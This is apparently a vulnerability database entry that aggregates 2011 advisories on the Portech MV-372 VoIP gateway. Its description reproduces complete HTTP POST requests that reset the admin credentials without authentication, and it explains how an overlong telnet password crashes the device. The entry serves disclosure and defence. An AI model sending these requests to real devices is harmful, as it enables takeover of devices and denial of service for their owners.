ID
VAR-190001-1025
TITLE
Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities
Trust: 0.9
DESCRIPTION
Portech MV-372 has a WEB management verification bypass vulnerability. An attacker submits a malicious POST request without having to verify the username and password of the changed device: POST http://<device address>/change.cgi HTTP/1.1Host: <device address >User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101Firefox/5.0Accept: text/html, application/xhtml+xml, application/xml; q=0.9,*/*;q= 0.8Accept-Language: hu-hu, hu; q=0.8, en-us; q=0.5, en; q=0.3Accept-Encoding: gzip, deflateAccept-Charset: ISO-8859-2, utf-8; q= 0.7,*;q=0.7Connection: keep-aliveReferer: http://192.168.0.100/change.htmContent-Type: application/x-www-form-urlencodedContent-Length: 50Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit to save These username and password changes can be submitted as follows: POST http://<device address>/save.cgiHost: <device address>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101Firefox /5.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5 ,en;q=0.3Accept-E Ncoding: gzip, deflateAccept-Charset: ISO-8859-2, utf-8; q=0.7, *; q=0.7Connection: keep-aliveReferer: http://192.168.0.100/save.htmContent-Type: application/x -www-form-urlencodedContent-Length: 11submit=Save. Portech MV-372 is a VoIP network management device. The Portech MV-372 Telnet service has a remote denial of service vulnerability. Providing a very long password such as 5000 characters can cause the telnet service to crash. You need to restart the device for normal functions. The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request
Trust: 1.35
IOT TAXONOMY
| category: | ['Network device'] | sub_category: | - | Trust: 1.2 |
AFFECTED PRODUCTS
| vendor: | portech | model: | mv-372 | scope: | eq | version: | 0 | Trust: 1.5 |
THREAT TYPE
remote
Trust: 0.6
TYPE
Unknown
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 48560 | Trust: 2.1 |
| db: | CNVD | id: | CNVD-2011-2554 | Trust: 0.6 |
| db: | CNVD | id: | CNVD-2011-2552 | Trust: 0.6 |
| db: | CNNVD | id: | CNNVD-201107-076 | Trust: 0.6 |
REFERENCES
| url: | http://seclists.org/fulldisclosure/2011/jul/26 | Trust: 1.2 |
| url: | http://www.securityfocus.com/bid/48560 | Trust: 0.6 |
| url: | http://www.portech.com.tw/p3-product1_1.asp?pid=14 | Trust: 0.3 |
CREDITS
Zsolt Imre
Trust: 0.9
SOURCES
| db: | CNVD | id: | CNVD-2011-2554 |
| db: | CNVD | id: | CNVD-2011-2552 |
| db: | BID | id: | 48560 |
| db: | CNNVD | id: | CNNVD-201107-076 |
LAST UPDATE DATE
2022-05-17T02:09:35.519000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2011-2554 | date: | 2011-07-06T00:00:00 |
| db: | CNVD | id: | CNVD-2011-2552 | date: | 2011-07-06T00:00:00 |
| db: | BID | id: | 48560 | date: | 2011-07-05T00:00:00 |
| db: | CNNVD | id: | CNNVD-201107-076 | date: | 2011-07-07T00:00:00 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2011-2554 | date: | 2011-07-06T00:00:00 |
| db: | CNVD | id: | CNVD-2011-2552 | date: | 2011-07-06T00:00:00 |
| db: | BID | id: | 48560 | date: | 2011-07-05T00:00:00 |
| db: | CNNVD | id: | CNNVD-201107-076 | date: | 1900-01-01T00:00:00 |